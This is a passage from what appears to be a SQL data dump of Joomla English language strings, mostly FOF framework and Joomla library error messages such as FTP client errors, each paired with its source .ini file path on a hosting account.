writeable','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1267,'LIB_FOF_DOWNLOAD_ERR_CURL_ERROR','The download failed: cURL error %s: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1268,'LIB_FOF_DOWNLOAD_ERR_FOPEN_ERROR','The download failed: fopen returned no header information','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1269,'LIB_FOF_DOWNLOAD_ERR_HTTPERROR','Unexpected HTTP status %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1270,'LIB_FOF_MODEL_ERR_GET_NAME','FOF: Model: Cannot get Model\'s name','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1271,'LIB_FOF_CONTROLLER_ERR_GET_NAME','FOF: Controller: Cannot get Controller\'s name','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1272,'LIB_FOF_VIEW_ERR_GET_NAME','FOF: Controller: Cannot get View\'s name','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1273,'LIB_FOF_TRANSPARENTAUTH_ERR_NOT_FOUND','FOF: TransparentAuthentication %s not found','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1274,'LIB_FOF_DISPATCHER_ERR_NOT_FOUND','FOF: Dispatcher %s not found','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1275,'LIB_FOF_TOOLBAR_ERR_NOT_FOUND','FOF: Toolbar %s not found','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1276,'LIB_FOF_CONTROLLER_ERR_NOT_FOUND','FOF: Controller %s not found','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1277,'LIB_FOF_MODEL_ERR_NOT_FOUND','FOF: Model %s not found','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1278,'LIB_FOF_VIEW_ERR_NOT_FOUND','FOF: View %s not found','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1279,'LIB_FOF_CONTROLLER_ERR_LOCKED','This item is already checked out by another user','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1280,'LIB_FOF_FORM_ERR_GETSTATIC_NOT_ALLOWED','FOF: %s cannot be used in single item display forms','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1281,'LIB_FOF_FORM_ERR_DATAMODEL_REQUIRED','FOF: %s requires a DataModel to act upon','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1282,'LIB_FOF_FORM_ERR_GETOPTIONS_INVALID_GROUP_CONTENTS','FOF: %s invalid group contents in getOptions','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1283,'LIB_FOF_FORM_ERR_GETINPUT_NOT_ALLOWED','FOF: %s cannot be used in input forms','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1284,'LIB_FOF_HAL_ERR_INVALIDLINK','A HAL link must always have a non-empty href','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1285,'LIB_FOF_HAL_ERR_INVALIDRENDERFORMAT','Unsupported HAL Document format "%s". Render aborted.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1286,'LIB_FOF_MODEL_ERR_BIND','FOF: %s::bind() argument is %s, not an object or array','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1287,'LIB_FOF_MODEL_ERR_COULDNOTLOAD','Could not load record','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1288,'LIB_FOF_MODEL_ERR_NOITEMSFOUND','No items found in %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1289,'LIB_FOF_MODEL_ERR_CANNOTLOCKNOTLOADEDRECORD','Cannot lock a record which has not been loaded','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1290,'LIB_FOF_MODEL_ERR_NOASSETKEY','Table must have an asset key defined and a value for the table id in order to track assets','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1291,'LIB_FOF_MODEL_ERR_NOCONTENTTYPE','Content type for %s is not set.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1292,'LIB_FOF_MODEL_ERR_TREE_INCOMPATIBLETABLE','Database table %s is not compatible with TreeModel: it does not have lft/rgt columns','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1293,'LIB_FOF_MODEL_ERR_TREE_UNEXPECTEDPK','No primary key provided or deleting this record is not allowed','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1294,'LIB_FOF_MODEL_ERR_TREE_UNSUPPORTEDMETHOD','Method %s() is not supported by TreeModel','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1295,'LIB_FOF_MODEL_ERR_TREE_ONLYINROOT','Method %s() is only allowed for root nodes','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1296,'LIB_FOF_MODEL_ERR_TREE_INVALIDLFTRGT_PARENT','Invalid lft/rgt values in parent node','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1297,'LIB_FOF_MODEL_ERR_TREE_INVALIDLFTRGT_SIBLING','Invalid lft/rgt values in sibling node','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1298,'LIB_FOF_MODEL_ERR_TREE_INVALIDLFTRGT_OTHER','Invalid lft/rgt values in current node','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1299,'LIB_FOF_MODEL_ERR_TREE_INVALIDLFTRGT_CURRENT','Invalid lft/rgt values in other node','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1300,'LIB_FOF_MODEL_ERR_TREE_ROOTNOTFOUND','No root found for table %s, node lft=%s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1301,'LIB_FOF_MODEL_ERR_FILTER_INVALIDFIELD','Invalid field object','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1302,'LIB_FOF_MODEL_ERR_FILTER_NODBOBJECT','Database object unspecified creating a %s filter','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1303,'LIB_FOF_TOOLBAR_ERR_MISSINGARGUMENT','The \'%s\' attribute is required for the \'%s\' button type','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1304,'LIB_FOF_TOOLBAR_ERR_UNKNOWNBUTTONTYPE','Unknown button type %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1305,'LIB_FOF_VIEW_MODELNOTINVIEW','The model %s does not exist in view %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1306,'LIB_FOF_VIEW_UNRECOGNISEDEXTENSION','FOF: Unrecognised extension in view template %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1307,'LIB_FOF_VIEW_POSSIBLYSUHOSIN','FOF: Could not write to your cache directory. Please make your cache directories (cache and administrator/cache under your site\'s root) writeable to PHP by changing the permissions. Alternatively, ask your host to make sure that they have not disabled the stream_wrapper_register() function in PHP. Moreover, if your host is using the Suhosin patch for PHP ask them to whitelist the fof:// stream wrapper in their server\'s php.ini file. If you do not understand what this means please contact your host and paste this entire message to them.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1308,'LIB_IDNA','IDNA Convert','/home/smthsmth/public_html/language/en-GB/en-GB.lib_idna_convert.sys.ini'),(1309,'LIB_IDNA_XML_DESCRIPTION','The class idna_convert allows to convert internationalised domain names (see RFC 3490, 3491, 3492 and 3454 for details) as they can be used with various registries worldwide to be translated between their original (localised) form and their encoded form as it will be used in the DNS (Domain Name System).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_idna_convert.sys.ini'),(1310,'JERROR_PARSING_LANGUAGE_FILE',' : error(s) in line(s) %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1311,'JLIB_APPLICATION_ERROR_ACCESS_FORBIDDEN','Access forbidden.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1312,'JLIB_APPLICATION_ERROR_APPLICATION_GET_NAME','JApplication: :getName() : Can\'t get or parse class name.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1313,'JLIB_APPLICATION_ERROR_APPLICATION_LOAD','Unable to load application: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1314,'JLIB_APPLICATION_ERROR_BATCH_CANNOT_CREATE','You are not allowed to create new items in this category.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1315,'JLIB_APPLICATION_ERROR_BATCH_CANNOT_EDIT','You are not allowed to edit one or more of these items.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1316,'JLIB_APPLICATION_ERROR_BATCH_FAILED','Batch process failed with following error: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1317,'JLIB_APPLICATION_ERROR_BATCH_MOVE_CATEGORY_NOT_FOUND','Can\'t find the destination category for this move.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1318,'JLIB_APPLICATION_ERROR_BATCH_MOVE_ROW_NOT_FOUND','Can\'t find the item being moved.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1319,'JLIB_APPLICATION_ERROR_CHECKIN_FAILED','Check-in failed with the following error: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1320,'JLIB_APPLICATION_ERROR_CHECKIN_NOT_CHECKED','Item is not checked out.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1321,'JLIB_APPLICATION_ERROR_CHECKIN_USER_MISMATCH','The user checking in does not match the user who checked out the item.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1322,'JLIB_APPLICATION_ERROR_CHECKOUT_FAILED','Check-out failed with the following error: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1323,'JLIB_APPLICATION_ERROR_CHECKOUT_USER_MISMATCH','The user checking out does not match the user who checked out the item.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1324,'JLIB_APPLICATION_ERROR_COMPONENT_NOT_FOUND','Component not found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1325,'JLIB_APPLICATION_ERROR_COMPONENT_NOT_LOADING','Error loading component: %1$s, %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1326,'JLIB_APPLICATION_ERROR_CONTROLLER_GET_NAME','JController: :getName() : Can\'t get or parse class name.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1327,'JLIB_APPLICATION_ERROR_CREATE_RECORD_NOT_PERMITTED','Create record not permitted.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1328,'JLIB_APPLICATION_ERROR_DELETE_NOT_PERMITTED','Delete not permitted.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1329,'JLIB_APPLICATION_ERROR_EDITSTATE_NOT_PERMITTED','Edit state is not permitted.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1330,'JLIB_APPLICATION_ERROR_EDIT_ITEM_NOT_PERMITTED','Edit is not permitted.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1331,'JLIB_APPLICATION_ERROR_EDIT_NOT_PERMITTED','Edit not permitted.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1332,'JLIB_APPLICATION_ERROR_HISTORY_ID_MISMATCH','Error restoring item version from history.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1333,'JLIB_APPLICATION_ERROR_INSUFFICIENT_BATCH_INFORMATION','Insufficient information to perform the batch operation.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1334,'JLIB_APPLICATION_ERROR_INVALID_CONTROLLER_CLASS','Invalid controller class: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1335,'JLIB_APPLICATION_ERROR_INVALID_CONTROLLER','Invalid controller: name=\'%s\', format=\'%s\'','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1336,'JLIB_APPLICATION_ERROR_LAYOUTFILE_NOT_FOUND','Layout %s not found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1337,'JLIB_APPLICATION_ERROR_LIBRARY_NOT_FOUND','Library not found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1338,'JLIB_APPLICATION_ERROR_LIBRARY_NOT_LOADING','Error loading library: %1$s, %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1339,'JLIB_APPLICATION_ERROR_MENU_LOAD','Error loading menu: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1340,'JLIB_APPLICATION_ERROR_MODEL_GET_NAME','JModel: :getName() : Can\'t get or parse class name.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1341,'JLIB_APPLICATION_ERROR_MODULE_LOAD','Error loading module %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1342,'JLIB_APPLICATION_ERROR_PATHWAY_LOAD','Unable to load pathway: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1343,'JLIB_APPLICATION_ERROR_REORDER_FAILED','Reorder failed. Error: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1344,'JLIB_APPLICATION_ERROR_ROUTER_LOAD','Unable to load router: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1345,'JLIB_APPLICATION_ERROR_MODELCLASS_NOT_FOUND','Model class %s not found in file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1346,'JLIB_APPLICATION_ERROR_SAVE_FAILED','Save failed with the following error: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1347,'JLIB_APPLICATION_ERROR_SAVE_NOT_PERMITTED','Save not permitted.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1348,'JLIB_APPLICATION_ERROR_TABLE_NAME_NOT_SUPPORTED','Table %s not supported. File not found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1349,'JLIB_APPLICATION_ERROR_TASK_NOT_FOUND','Task [%s] not found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1350,'JLIB_APPLICATION_ERROR_UNHELD_ID','You are not permitted to use that link to directly access that page (#%d).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1351,'JLIB_APPLICATION_ERROR_VIEW_CLASS_NOT_FOUND','View class not found [class, file]: %1$s, %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1352,'JLIB_APPLICATION_ERROR_VIEW_GET_NAME_SUBSTRING','JView: :getName() : Your classname has the substring \'view\'. This causes problems when extracting the classname from the name of your objects view. Avoid Object names with the substring \'view\'.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1353,'JLIB_APPLICATION_ERROR_VIEW_GET_NAME','JView: :getName() : Can\'t get or parse class name.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1354,'JLIB_APPLICATION_ERROR_VIEW_NOT_FOUND','View not found [name, type, prefix]: %1$s, %2$s, %3$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1355,'JLIB_APPLICATION_SAVE_SUCCESS','Item saved.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1356,'JLIB_APPLICATION_SUBMIT_SAVE_SUCCESS','Item submitted.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1357,'JLIB_APPLICATION_SUCCESS_BATCH','Batch process completed.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1358,'JLIB_APPLICATION_SUCCESS_ITEM_REORDERED','Ordering saved.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1359,'JLIB_APPLICATION_SUCCESS_ORDERING_SAVED','Ordering saved.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1360,'JLIB_APPLICATION_SUCCESS_LOAD_HISTORY','Prior version restored. Saved on %s %s.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1361,'JLIB_LOGIN_AUTHENTICATE','Username and password do not match or you do not have an account yet.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1362,'JLIB_CACHE_ERROR_CACHE_HANDLER_LOAD','Unable to load Cache Handler: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1363,'JLIB_CACHE_ERROR_CACHE_STORAGE_LOAD','Unable to load Cache Storage: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1364,'JLIB_CAPTCHA_ERROR_PLUGIN_NOT_FOUND','Captcha plugin not set or not found. Please contact a site administrator.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1365,'JLIB_CLIENT_ERROR_JFTP_NO_CONNECT','JFTP: :connect: Could not connect to host \' %1$s \' on port \' %2$s \'','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1366,'JLIB_CLIENT_ERROR_JFTP_NO_CONNECT_SOCKET','JFTP: :connect: Could not connect to host \' %1$s \' on port \' %2$s \'. Socket error number: %3$s and error message: %4$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1367,'JLIB_CLIENT_ERROR_JFTP_BAD_RESPONSE','JFTP: :connect: Bad response. Server response: %s [Expected: 220]','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1368,'JLIB_CLIENT_ERROR_JFTP_BAD_USERNAME','JFTP: :login: Bad Username. Server response: %1$s [Expected: 331]. Username sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1369,'JLIB_CLIENT_ERROR_JFTP_BAD_PASSWORD','JFTP: :login: Bad Password. Server response: %1$s [Expected: 230]. Password sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1370,'JLIB_CLIENT_ERROR_JFTP_PWD_BAD_RESPONSE_NATIVE','FTP: :pwd: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1371,'JLIB_CLIENT_ERROR_JFTP_PWD_BAD_RESPONSE','JFTP: :pwd: Bad response. Server response: %s [Expected: 257]','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1372,'JLIB_CLIENT_ERROR_JFTP_SYST_BAD_RESPONSE_NATIVE','JFTP: :syst: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1373,'JLIB_CLIENT_ERROR_JFTP_SYST_BAD_RESPONSE','JFTP: :syst: Bad response. Server response: %s [Expected: 215]','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1374,'JLIB_CLIENT_ERROR_JFTP_CHDIR_BAD_RESPONSE_NATIVE','JFTP: :chdir: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1375,'JLIB_CLIENT_ERROR_JFTP_CHDIR_BAD_RESPONSE','JFTP: :chdir: Bad response. Server response: %1$s [Expected: 250]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1376,'JLIB_CLIENT_ERROR_JFTP_REINIT_BAD_RESPONSE_NATIVE','JFTP: :reinit: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1377,'JLIB_CLIENT_ERROR_JFTP_REINIT_BAD_RESPONSE','JFTP: :reinit: Bad response. Server response: %s [Expected: 220]','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1378,'JLIB_CLIENT_ERROR_JFTP_RENAME_BAD_RESPONSE_NATIVE','JFTP: :rename: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1379,'JLIB_CLIENT_ERROR_JFTP_RENAME_BAD_RESPONSE_FROM','JFTP: :rename: Bad response. Server response: %1$s [Expected: 350]. From path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1380,'JLIB_CLIENT_ERROR_JFTP_RENAME_BAD_RESPONSE_TO','JFTP: :rename: Bad response. Server response: %1$s [Expected: 250]. To path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1381,'JLIB_CLIENT_ERROR_JFTP_CHMOD_BAD_RESPONSE_NATIVE','JFTP: :chmod: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1382,'JLIB_CLIENT_ERROR_JFTP_CHMOD_BAD_RESPONSE','JFTP: :chmod: Bad response. Server response: %1$s [Expected: 250]. Path sent: %2$s. Mode sent: %3$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1383,'JLIB_CLIENT_ERROR_JFTP_DELETE_BAD_RESPONSE_NATIVE','JFTP: :delete: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1384,'JLIB_CLIENT_ERROR_JFTP_DELETE_BAD_RESPONSE','JFTP: :delete: Bad response. Server response: %1$s [Expected: 250]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1385,'JLIB_CLIENT_ERROR_JFTP_MKDIR_BAD_RESPONSE_NATIVE','JFTP: :mkdir: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1386,'JLIB_CLIENT_ERROR_JFTP_MKDIR_BAD_RESPONSE','JFTP: :mkdir: Bad response. Server response: %1$s [Expected: 257]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1387,'JLIB_CLIENT_ERROR_JFTP_RESTART_BAD_RESPONSE_NATIVE','JFTP: :restart: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1388,'JLIB_CLIENT_ERROR_JFTP_RESTART_BAD_RESPONSE','JFTP: :restart: Bad response. Server response: %1$s [Expected: 350]. Restart point sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1389,'JLIB_CLIENT_ERROR_JFTP_CREATE_BAD_RESPONSE_BUFFER','JFTP: :create: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1390,'JLIB_CLIENT_ERROR_JFTP_CREATE_BAD_RESPONSE_PASSIVE','JFTP: :create: Unable to use passive mode.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1391,'JLIB_CLIENT_ERROR_JFTP_CREATE_BAD_RESPONSE','JFTP: :create: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1392,'JLIB_CLIENT_ERROR_JFTP_CREATE_BAD_RESPONSE_TRANSFER','JFTP: :create: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1393,'JLIB_CLIENT_ERROR_JFTP_READ_BAD_RESPONSE_BUFFER','JFTP: :read: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1394,'JLIB_CLIENT_ERROR_JFTP_READ_BAD_RESPONSE_PASSIVE','JFTP: :read: Unable to use passive mode.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1395,'JLIB_CLIENT_ERROR_JFTP_READ_BAD_RESPONSE','JFTP: :read: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1396,'JLIB_CLIENT_ERROR_JFTP_READ_BAD_RESPONSE_TRANSFER','JFTP: :read: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1397,'JLIB_CLIENT_ERROR_JFTP_GET_BAD_RESPONSE','JFTP: :get: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1398,'JLIB_CLIENT_ERROR_JFTP_GET_PASSIVE','JFTP: :get: Unable to use passive mode.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1399,'JLIB_CLIENT_ERROR_JFTP_GET_WRITING_LOCAL','JFTP: :get: Unable to open local file for writing. Local path: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1400,'JLIB_CLIENT_ERROR_JFTP_GET_BAD_RESPONSE_RETR','JFTP: :get: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1401,'JLIB_CLIENT_ERROR_JFTP_GET_BAD_RESPONSE_TRANSFER','JFTP: :get: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1402,'JLIB_CLIENT_ERROR_JFTP_STORE_PASSIVE','JFTP: :store: Unable to use passive mode.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1403,'JLIB_CLIENT_ERROR_JFTP_STORE_BAD_RESPONSE','JFTP: :store: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1404,'JLIB_CLIENT_ERROR_JFTP_STORE_READING_LOCAL','JFTP: :store: Unable to open local file for reading. Local path: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1405,'JLIB_CLIENT_ERROR_JFTP_STORE_FIND_LOCAL','JFTP: :store: Unable to find local file. Local path: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1406,'JLIB_CLIENT_ERROR_JFTP_STORE_BAD_RESPONSE_STOR','JFTP: :store: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1407,'JLIB_CLIENT_ERROR_JFTP_STORE_DATA_PORT','JFTP: :store: Unable to write to data port socket.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1408,'JLIB_CLIENT_ERROR_JFTP_STORE_BAD_RESPONSE_TRANSFER','JFTP: :store: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1409,'JLIB_CLIENT_ERROR_JFTP_WRITE_PASSIVE','JFTP: :write: Unable to use passive mode.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1410,'JLIB_CLIENT_ERROR_JFTP_WRITE_BAD_RESPONSE','JFTP: :write: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1411,'JLIB_CLIENT_ERROR_JFTP_WRITE_BAD_RESPONSE_STOR','JFTP: :write: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1412,'JLIB_CLIENT_ERROR_JFTP_WRITE_DATA_PORT','JFTP: :write: Unable to write to data port socket.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1413,'JLIB_CLIENT_ERROR_JFTP_WRITE_BAD_RESPONSE_TRANSFER','JFTP: :write: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1414,'JLIB_CLIENT_ERROR_JFTP_APPEND_PASSIVE','JFTP: :append: Unable to use passive mode','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1415,'JLIB_CLIENT_ERROR_JFTP_APPEND_BAD_RESPONSE','JFTP: :append: Bad response','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1416,'JLIB_CLIENT_ERROR_JFTP_APPEND_BAD_RESPONSE_APPE','JFTP: :append: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1417,'JLIB_CLIENT_ERROR_JFTP_APPEND_DATA_PORT','JFTP: :append: Unable to write to data port socket','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1418,'JLIB_CLIENT_ERROR_JFTP_APPEND_BAD_RESPONSE_TRANSFER','JFTP: :append: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1419,'JLIB_CLIENT_ERROR_JFTP_SIZE_BAD_RESPONSE','JFTP: :size: Bad response','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1420,'JLIB_CLIENT_ERROR_JFTP_SIZE_PASSIVE','JFTP: :size: Unable to use passive mode','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1421,'JLIB_CLIENT_ERROR_JFTP_LISTNAMES_PASSIVE','JFTP: :listNames: Unable to use passive 